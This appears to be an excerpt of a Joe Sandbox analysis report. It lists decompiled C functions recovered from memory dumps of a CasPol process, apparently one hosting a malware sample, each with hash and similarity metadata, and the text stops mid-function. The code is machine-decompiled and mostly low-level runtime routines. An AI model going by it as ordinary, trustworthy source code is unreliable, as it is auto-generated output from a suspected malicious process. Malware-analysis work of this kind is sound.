                                                                C-Code - Quality: 100%
                                                                			E00401B30(signed int _a4) {
                                                                				char* _t19;
                                                                				signed int _t27;
                                                                				signed int _t33;
                                                                				signed int _t51;
                                                                				signed int _t52;
                                                                				intOrPtr _t60;
                                                                				signed int _t67;
                                                                				signed int _t75;
                                                                				intOrPtr _t81;
                                                                
                                                                				_t19 = _a4;
                                                                				if(_t19 != 0) {
                                                                					if( *_t19 == 0) {
                                                                						_t51 =  *(_t19 + 4);
                                                                						 *_t19 = 1;
                                                                						_t60 =  *0x7ffe0018;
                                                                						_t81 =  *0x7ffe001c;
                                                                						if(_t51 == 0) {
                                                                							_t52 =  *0x7ffe0014;
                                                                							do {
                                                                							} while (_t60 != _t81);
                                                                						} else {
                                                                							do {
                                                                							} while (_t60 != _t81);
                                                                							_t52 = _t51 *  *0x7ffe0014;
                                                                						}
                                                                						 *(_t19 + 8) = _t52;
                                                                						 *(_t19 + 0xc) = 0x76d0;
                                                                						 *(_t19 + 0x10) = 0x4c11;
                                                                						 *(_t19 + 0x14) = 0x7f40;
                                                                					}
                                                                					_t27 = ( *(_t19 + 8) << 0x00000012 ^  *(_t19 + 8) >> 0x00000007) & 0x0007ffff ^  *(_t19 + 8) << 0x00000012 ^ _t53 >> 0x0000000d;
                                                                					_t55 =  *(_t19 + 0xc);
                                                                					_a4 = _t27;
                                                                					 *(_t19 + 8) = _t27;
                                                                					_t56 =  *(_t19 + 0x10);
                                                                					_t33 = ( *(_t19 + 0xc) >> 0x00000019 ^  *(_t19 + 0xc) * 0x00000004) & 0x0000001f ^ _t55 >> 0x0000001b ^ _t55 * 0x00000004;
                                                                					_t67 = ( *(_t19 + 0x10) >> 0x00000008 ^  *(_t19 + 0x10) << 0x00000007) & 0x000007ff ^ _t56 >> 0x00000015 ^ _t56 << 0x00000007;
                                                                					_t75 = ( *(_t19 + 0x14) << 0x0000000d ^  *(_t19 + 0x14) >> 0x00000009) & 0x000fffff ^  *(_t19 + 0x14) >> 0x0000000c ^ _t58 << 0x0000000d;
                                                                					 *(_t19 + 0x14) = _t75;
                                                                					 *(_t19 + 0x10) = _t67;
                                                                					 *(_t19 + 0xc) = _t33;
                                                                					return (_t75 ^ _t67 ^ _t33 ^ _a4) >> 1;
                                                                				} else {
                                                                					return _t19;
                                                                				}
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                • Instruction ID: 03c70336a4477be214f950dbac9bbdc3b87b084157193ef14a93f6bd51de86e4
                                                                • Opcode Fuzzy Hash: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                • Instruction Fuzzy Hash: D931E272B006104FD71CCF55C494A66B7A3ABC8360B1AC2BEDA1A5B3E1CB78AC10C7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 74%
                                                                			E0165E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                				intOrPtr* _v0;
                                                                				signed char _v4;
                                                                				signed int _v8;
                                                                				void* __ecx;
                                                                				void* __ebp;
                                                                				void* _t37;
                                                                				intOrPtr _t38;
                                                                				signed int _t44;
                                                                				signed char _t52;
                                                                				void* _t54;
                                                                				intOrPtr* _t56;
                                                                				void* _t58;
                                                                				char* _t59;
                                                                				signed int _t62;
                                                                
                                                                				_t58 = __edx;
                                                                				_push(0);
                                                                				_push(4);
                                                                				_push( &_v8);
                                                                				_push(0x24);
                                                                				_push(0xffffffff);
                                                                				if(E01669670() < 0) {
                                                                					L0167DF30(_t54, _t58, _t35);
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					asm("int3");
                                                                					_push(_t54);
                                                                					_t52 = _v4;
                                                                					if(_t52 > 8) {
                                                                						_t37 = 0xc0000078;
                                                                					} else {
                                                                						_t38 =  *0x1717b9c; // 0x0
                                                                						_t62 = _t52 & 0x000000ff;
                                                                						_t59 = L01644620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                						if(_t59 == 0) {
                                                                							_t37 = 0xc0000017;
                                                                						} else {
                                                                							_t56 = _v0;
                                                                							 *(_t59 + 1) = _t52;
                                                                							 *_t59 = 1;
                                                                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                							_t44 = _t62 - 1;
                                                                							if(_t44 <= 7) {
                                                                								switch( *((intOrPtr*)(_t44 * 4 +  &M0165E810))) {
                                                                									case 0:
                                                                										L6:
                                                                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                										goto L7;
                                                                									case 1:
                                                                										L13:
                                                                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                										goto L6;
                                                                									case 2:
                                                                										L12:
                                                                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                										goto L13;
                                                                									case 3:
                                                                										L11:
                                                                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                										goto L12;
                                                                									case 4:
                                                                										L10:
                                                                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                										goto L11;
                                                                									case 5:
                                                                										L9:
                                                                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                										goto L10;
                                                                									case 6:
                                                                										L17:
                                                                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                										goto L9;
                                                                									case 7:
                                                                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                										goto L17;
                                                                								}
                                                                							}
                                                                							L7:
                                                                							 *_a40 = _t59;
                                                                							_t37 = 0;
                                                                						}
                                                                					}
                                                                					return _t37;
                                                                				} else {
                                                                					_push(0x20);
                                                                					asm("ror eax, cl");
                                                                					return _a4 ^ _v8;
                                                                				}
                                                                			}


















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 631b16e21a36a08cde14037094bc39c3238ed76b8e7abd81202856a8cdfeb8d3
                                                                • Instruction ID: b1b157de4db86bbd8a3403128a97a480d495e8a676ddb4af48ac37816d83e319
                                                                • Opcode Fuzzy Hash: 631b16e21a36a08cde14037094bc39c3238ed76b8e7abd81202856a8cdfeb8d3
                                                                • Instruction Fuzzy Hash: 4C315C75A14249AFDB44CF68D841B9AFBE8FB09314F14825AF904CB341D632ED90CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E0165BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				intOrPtr _t22;
                                                                				intOrPtr* _t41;
                                                                				intOrPtr _t51;
                                                                
                                                                				_t51 =  *0x1716100; // 0x5
                                                                				_v12 = __edx;
                                                                				_v8 = __ecx;
                                                                				if(_t51 >= 0x800) {
                                                                					L12:
                                                                					return 0;
                                                                				} else {
                                                                					goto L1;
                                                                				}
                                                                				while(1) {
                                                                					L1:
                                                                					_t22 = _t51;
                                                                					asm("lock cmpxchg [ecx], edx");
                                                                					if(_t51 == _t22) {
                                                                						break;
                                                                					}
                                                                					_t51 = _t22;
                                                                					if(_t22 < 0x800) {
                                                                						continue;
                                                                					}
                                                                					goto L12;
                                                                				}
                                                                				E01642280(0xd, 0x736f1a0);
                                                                				_t41 =  *0x17160f8; // 0x0
                                                                				if(_t41 != 0) {
                                                                					 *0x17160f8 =  *_t41;
                                                                					 *0x17160fc =  *0x17160fc + 0xffff;
                                                                				}
                                                                				E0163FFB0(_t41, 0x800, 0x736f1a0);
                                                                				if(_t41 != 0) {
                                                                					L6:
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					asm("movsd");
                                                                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                					do {
                                                                						asm("lock xadd [0x17160f0], ax");
                                                                						 *((short*)(_t41 + 0x34)) = 1;
                                                                					} while (1 == 0);
                                                                					goto L8;
                                                                				} else {
                                                                					_t41 = L01644620(0x1716100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                					if(_t41 == 0) {
                                                                						L11:
                                                                						asm("lock dec dword [0x1716100]");
                                                                						L8:
                                                                						return _t41;
                                                                					}
                                                                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                					if(_t41 == 0) {
                                                                						goto L11;
                                                                					}
                                                                					goto L6;
                                                                				}
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 836d17d48a543ab7f34531bee5c36d0e48c61a212ee88bb03c34729ef454771e
                                                                • Instruction ID: c32a5084a47ead977a95f461a9757be98a6359d9799977a8917947c104033c62
                                                                • Opcode Fuzzy Hash: 836d17d48a543ab7f34531bee5c36d0e48c61a212ee88bb03c34729ef454771e
                                                                • Instruction Fuzzy Hash: 30310132A006169BCB51EF5CC8C0BA673B5FB18321F1541B8ED44DB305EBB4DA05CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 76%
                                                                			E01629100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                				signed int _t53;
                                                                				signed int _t56;
                                                                				signed int* _t60;
                                                                				signed int _t63;
                                                                				signed int _t66;
                                                                				signed int _t69;
                                                                				void* _t70;
                                                                				intOrPtr* _t72;
                                                                				void* _t78;
                                                                				void* _t79;
                                                                				signed int _t80;
                                                                				intOrPtr _t82;
                                                                				void* _t85;
                                                                				void* _t88;
                                                                				void* _t89;
                                                                
                                                                				_t84 = __esi;
                                                                				_t70 = __ecx;
                                                                				_t68 = __ebx;
                                                                				_push(0x2c);
                                                                				_push(0x16ff6e8);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				 *((char*)(_t85 - 0x1d)) = 0;
                                                                				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                				if(_t82 == 0) {
                                                                					L4:
                                                                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                						E016F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                					}
                                                                					L5:
                                                                					return E0167D130(_t68, _t82, _t84);
                                                                				}
                                                                				_t88 = _t82 -  *0x17186c0; // 0x11c07b0
                                                                				if(_t88 == 0) {
                                                                					goto L4;
                                                                				}
                                                                				_t89 = _t82 -  *0x17186b8; // 0x0
                                                                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                					goto L4;
                                                                				} else {
                                                                					E01642280(_t82 + 0xe0, _t82 + 0xe0);
                                                                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                					__eflags =  *((char*)(_t82 + 0xe5));
                                                                					if(__eflags != 0) {
                                                                						E016F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                						goto L12;
                                                                					} else {
                                                                						__eflags =  *((char*)(_t82 + 0xe4));
                                                                						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                							 *((char*)(_t82 + 0xe4)) = 1;
                                                                							_push(_t82);
                                                                							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                							E0166AFD0();
                                                                						}
                                                                						while(1) {
                                                                							_t60 = _t82 + 8;
                                                                							 *(_t85 - 0x2c) = _t60;
                                                                							_t68 =  *_t60;
                                                                							_t80 = _t60[1];
                                                                							 *(_t85 - 0x28) = _t68;
                                                                							 *(_t85 - 0x24) = _t80;
                                                                							while(1) {
                                                                								L10:
                                                                								__eflags = _t80;
                                                                								if(_t80 == 0) {
                                                                									break;
                                                                								}
                                                                								_t84 = _t68;
                                                                								 *(_t85 - 0x30) = _t80;
                                                                								 *(_t85 - 0x24) = _t80 - 1;
                                                                								asm("lock cmpxchg8b [edi]");
                                                                								_t68 = _t84;
                                                                								 *(_t85 - 0x28) = _t68;
                                                                								 *(_t85 - 0x24) = _t80;
                                                                								__eflags = _t68 - _t84;
                                                                								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                								if(_t68 != _t84) {
                                                                									continue;
                                                                								}
                                                                								__eflags = _t80 -  *(_t85 - 0x30);
                                                                								if(_t80 !=  *(_t85 - 0x30)) {
                                                                									continue;
                                                                								}
                                                                								__eflags = _t80;
                                                                								if(_t80 == 0) {
                                                                									break;
                                                                								}
                                                                								_t63 = 0;
                                                                								 *(_t85 - 0x34) = 0;
                                                                								_t84 = 0;
                                                                								__eflags = 0;
                                                                								while(1) {
                                                                									 *(_t85 - 0x3c) = _t84;
                                                                									__eflags = _t84 - 3;
                                                                									if(_t84 >= 3) {
                                                                										break;
                                                                									}
                                                                									__eflags = _t63;
                                                                									if(_t63 != 0) {
                                                                										L40:
                                                                										_t84 =  *_t63;
                                                                										__eflags = _t84;
                                                                										if(_t84 != 0) {
                                                                											_t84 =  *(_t84 + 4);
                                                                											__eflags = _t84;
                                                                											if(_t84 != 0) {
                                                                												 *0x171b1e0(_t63, _t82);
                                                                												 *_t84();
                                                                											}
                                                                										}
                                                                										do {
                                                                											_t60 = _t82 + 8;
                                                                											 *(_t85 - 0x2c) = _t60;
                                                                											_t68 =  *_t60;
                                                                											_t80 = _t60[1];
                                                                											 *(_t85 - 0x28) = _t68;
                                                                											 *(_t85 - 0x24) = _t80;
                                                                											goto L10;
                                                                										} while (_t63 == 0);
                                                                										goto L40;
                                                                									}
                                                                									_t69 = 0;
                                                                									__eflags = 0;
                                                                									while(1) {
                                                                										 *(_t85 - 0x38) = _t69;
                                                                										__eflags = _t69 -  *0x17184c0;
                                                                										if(_t69 >=  *0x17184c0) {
                                                                											break;
                                                                										}
                                                                										__eflags = _t63;
                                                                										if(_t63 != 0) {
                                                                											break;
                                                                										}
                                                                										_t66 = E016F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                										__eflags = _t66;
                                                                										if(_t66 == 0) {
                                                                											_t63 = 0;
                                                                											__eflags = 0;
                                                                										} else {
                                                                											_t63 = _t66 + 0xfffffff4;
                                                                										}
                                                                										 *(_t85 - 0x34) = _t63;
                                                                										_t69 = _t69 + 1;
                                                                									}
                                                                									_t84 = _t84 + 1;
                                                                								}
                                                                								__eflags = _t63;
                                                                							}
                                                                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                							 *((char*)(_t82 + 0xe5)) = 1;
                                                                							 *((char*)(_t85 - 0x1d)) = 1;
                                                                							L12:
                                                                							 *(_t85 - 4) = 0xfffffffe;
                                                                							E0162922A(_t82);
                                                                							_t53 = E01647D50();
                                                                							__eflags = _t53;
                                                                							if(_t53 != 0) {
                                                                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                							} else {
                                                                								_t56 = 0x7ffe0386;
                                                                							}
                                                                							__eflags =  *_t56;
                                                                							if( *_t56 != 0) {
                                                                								_t56 = E016F8B58(_t82);
                                                                							}
                                                                							__eflags =  *((char*)(_t85 - 0x1d));
                                                                							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                								__eflags = _t82 -  *0x17186c0; // 0x11c07b0
                                                                								if(__eflags != 0) {
                                                                									__eflags = _t82 -  *0x17186b8; // 0x0
                                                                									if(__eflags == 0) {
                                                                										_t79 = 0x17186bc;
                                                                										_t72 = 0x17186b8;
                                                                										goto L18;
                                                                									}
                                                                									__eflags = _t56 | 0xffffffff;
                                                                									asm("lock xadd [edi], eax");
                                                                									if(__eflags == 0) {
                                                                										E01629240(_t68, _t82, _t82, _t84, __eflags);
                                                                									}
                                                                								} else {
                                                                									_t79 = 0x17186c4;
                                                                									_t72 = 0x17186c0;
                                                                									L18:
                                                                									E01659B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                								}
                                                                							}
                                                                							goto L5;
                                                                						}
                                                                					}
                                                                				}
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a6b840303580e7cea04e022525b8b161c9f70b84fdfd181eccc09712ddfbd0a
                                                                • Instruction ID: 8f73c0631d230537f470714edab438d75061be14d2bb7a03dd9a1971a58b7708
                                                                • Opcode Fuzzy Hash: 4a6b840303580e7cea04e022525b8b161c9f70b84fdfd181eccc09712ddfbd0a
                                                                • Instruction Fuzzy Hash: 4C31B271A01A65DFEB26DB6DCC8C7ACBBB1BB99318F24855DC50467342C330A980CF56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 60%
                                                                			E01651DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                				char _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr* _v20;
                                                                				void* _t22;
                                                                				char _t23;
                                                                				void* _t36;
                                                                				intOrPtr _t42;
                                                                				intOrPtr _t43;
                                                                
                                                                				_v12 = __ecx;
                                                                				_t43 = 0;
                                                                				_v20 = __edx;
                                                                				_t42 =  *__edx;
                                                                				 *__edx = 0;
                                                                				_v16 = _t42;
                                                                				_push( &_v8);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(6);
                                                                				_push(0);
                                                                				_push(__ecx);
                                                                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                				_push(_t36);
                                                                				_t22 = E0164F460();
                                                                				if(_t22 < 0) {
                                                                					if(_t22 == 0xc0000023) {
                                                                						goto L1;
                                                                					}
                                                                					L3:
                                                                					return _t43;
                                                                				}
                                                                				L1:
                                                                				_t23 = _v8;
                                                                				if(_t23 != 0) {
                                                                					_t38 = _a4;
                                                                					if(_t23 >  *_a4) {
                                                                						_t42 = L01644620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                						if(_t42 == 0) {
                                                                							goto L3;
                                                                						}
                                                                						_t23 = _v8;
                                                                					}
                                                                					_push( &_v8);
                                                                					_push(_t23);
                                                                					_push(_t42);
                                                                					_push(6);
                                                                					_push(_t43);
                                                                					_push(_v12);
                                                                					_push(_t36);
                                                                					if(E0164F460() < 0) {
                                                                						if(_t42 != 0 && _t42 != _v16) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                						}
                                                                						goto L3;
                                                                					}
                                                                					 *_v20 = _t42;
                                                                					 *_a4 = _v8;
                                                                				}
                                                                				_t43 = 1;
                                                                				goto L3;
                                                                			}













                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                • Instruction ID: 243b216fa6abf2496facff3875871ba2b0e6297ee66fb7d1e163c5e3811472f9
                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                • Instruction Fuzzy Hash: 98218E72601119EFD721DF99CC81FABBBBDEF86640F114099EA059B210DB34AE01DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 53%
                                                                			E01640050(void* __ecx) {
                                                                				signed int _v8;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				intOrPtr* _t30;
                                                                				intOrPtr* _t31;
                                                                				signed int _t34;
                                                                				void* _t40;
                                                                				void* _t41;
                                                                				signed int _t44;
                                                                				intOrPtr _t47;
                                                                				signed int _t58;
                                                                				void* _t59;
                                                                				void* _t61;
                                                                				void* _t62;
                                                                				signed int _t64;
                                                                
                                                                				_push(__ecx);
                                                                				_v8 =  *0x171d360 ^ _t64;
                                                                				_t61 = __ecx;
                                                                				_t2 = _t61 + 0x20; // 0x20
                                                                				E01659ED0(_t2, 1, 0);
                                                                				_t52 =  *(_t61 + 0x8c);
                                                                				_t4 = _t61 + 0x8c; // 0x8c
                                                                				_t40 = _t4;
                                                                				do {
                                                                					_t44 = _t52;
                                                                					_t58 = _t52 & 0x00000001;
                                                                					_t24 = _t44;
                                                                					asm("lock cmpxchg [ebx], edx");
                                                                					_t52 = _t44;
                                                                				} while (_t52 != _t44);
                                                                				if(_t58 == 0) {
                                                                					L7:
                                                                					_pop(_t59);
                                                                					_pop(_t62);
                                                                					_pop(_t41);
                                                                					return E0166B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                				}
                                                                				asm("lock xadd [esi], eax");
                                                                				_t47 =  *[fs:0x18];
                                                                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                				if(_t30 != 0) {
                                                                					if( *_t30 == 0) {
                                                                						goto L4;
                                                                					}
                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                					L5:
                                                                					if( *_t31 != 0) {
                                                                						_t18 = _t61 + 0x78; // 0x78
                                                                						E016F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                					}
                                                                					_t52 =  *(_t61 + 0x5c);
                                                                					_t11 = _t61 + 0x78; // 0x78
                                                                					_t34 = E01659702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                					_t24 = _t34 | 0xffffffff;
                                                                					asm("lock xadd [esi], eax");
                                                                					if((_t34 | 0xffffffff) == 0) {
                                                                						 *0x171b1e0(_t61);
                                                                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                					}
                                                                					goto L7;
                                                                				}
                                                                				L4:
                                                                				_t31 = 0x7ffe0386;
                                                                				goto L5;
                                                                			}





















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb986143962ccee551d8fcafe6b68d64c4e5deb0c2778eda9df26131441dbd2f
                                                                • Instruction ID: 35cd680e824f588035f2bbc5d710c44cf93c38d65a7f89443669c5bacc58f894
                                                                • Opcode Fuzzy Hash: bb986143962ccee551d8fcafe6b68d64c4e5deb0c2778eda9df26131441dbd2f
                                                                • Instruction Fuzzy Hash: 51315C31601B14CFD726CB2CCC44B96B7E6FF89714F14856DEA9687B90EB75A802CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 77%
                                                                			E016A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                				signed short* _v8;
                                                                				signed char _v12;
                                                                				void* _t22;
                                                                				signed char* _t23;
                                                                				intOrPtr _t24;
                                                                				signed short* _t44;
                                                                				void* _t47;
                                                                				signed char* _t56;
                                                                				signed char* _t58;
                                                                
                                                                				_t48 = __ecx;
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t44 = __ecx;
                                                                				_v12 = __edx;
                                                                				_v8 = __ecx;
                                                                				_t22 = E01647D50();
                                                                				_t58 = 0x7ffe0384;
                                                                				if(_t22 == 0) {
                                                                					_t23 = 0x7ffe0384;
                                                                				} else {
                                                                					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                				}
                                                                				if( *_t23 != 0) {
                                                                					_t24 =  *0x1717b9c; // 0x0
                                                                					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                					_t23 = L01644620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                					_t56 = _t23;
                                                                					if(_t56 != 0) {
                                                                						_t56[0x24] = _a4;
                                                                						_t56[0x28] = _a8;
                                                                						_t56[6] = 0x1420;
                                                                						_t56[0x20] = _v12;
                                                                						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                						E0166F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                						if(E01647D50() != 0) {
                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                						}
                                                                						_push(_t56);
                                                                						_push(_t47 - 0x20);
                                                                						_push(0x402);
                                                                						_push( *_t58 & 0x000000ff);
                                                                						E01669AE0();
                                                                						_t23 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                					}
                                                                				}
                                                                				return _t23;
                                                                			}













                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2acf1eec9b4a6d6af9941afe6a34729d87ab4591776dcadd22f8124ca66699ab
                                                                • Instruction ID: 1068bb4426eebbc6b8138ccbeadd8e5c0951c8e53941fafe429e94b0ea3f7368
                                                                • Opcode Fuzzy Hash: 2acf1eec9b4a6d6af9941afe6a34729d87ab4591776dcadd22f8124ca66699ab
                                                                • Instruction Fuzzy Hash: 04217AB2A00655AFD715DF68DC80E6AB7A8FF48740F184069F905D7791DB34ED10CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E016690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                				intOrPtr* _v0;
                                                                				void* _v8;
                                                                				signed int _v12;
                                                                				intOrPtr _v16;
                                                                				char _v36;
                                                                				void* _t38;
                                                                				intOrPtr _t41;
                                                                				void* _t44;
                                                                				signed int _t45;
                                                                				intOrPtr* _t49;
                                                                				signed int _t57;
                                                                				signed int _t58;
                                                                				intOrPtr* _t59;
                                                                				void* _t62;
                                                                				void* _t63;
                                                                				void* _t65;
                                                                				void* _t66;
                                                                				signed int _t69;
                                                                				intOrPtr* _t70;
                                                                				void* _t71;
                                                                				intOrPtr* _t72;
                                                                				intOrPtr* _t73;
                                                                				char _t74;
                                                                
                                                                				_t65 = __edx;
                                                                				_t57 = _a4;
                                                                				_t32 = __ecx;
                                                                				_v8 = __edx;
                                                                				_t3 = _t32 + 0x14c; // 0x14c
                                                                				_t70 = _t3;
                                                                				_v16 = __ecx;
                                                                				_t72 =  *_t70;
                                                                				while(_t72 != _t70) {
                                                                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                						L24:
                                                                						_t72 =  *_t72;
                                                                						continue;
                                                                					}
                                                                					_t30 = _t72 + 0x10; // 0x10
                                                                					if(E0167D4F0(_t30, _t65, _t57) == _t57) {
                                                                						return 0xb7;
                                                                					}
                                                                					_t65 = _v8;
                                                                					goto L24;
                                                                				}
                                                                				_t61 = _t57;
                                                                				_push( &_v12);
                                                                				_t66 = 0x10;
                                                                				if(E0165E5E0(_t57, _t66) < 0) {
                                                                					return 0x216;
                                                                				}
                                                                				_t73 = L01644620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                				if(_t73 == 0) {
                                                                					_t38 = 0xe;
                                                                					return _t38;
                                                                				}
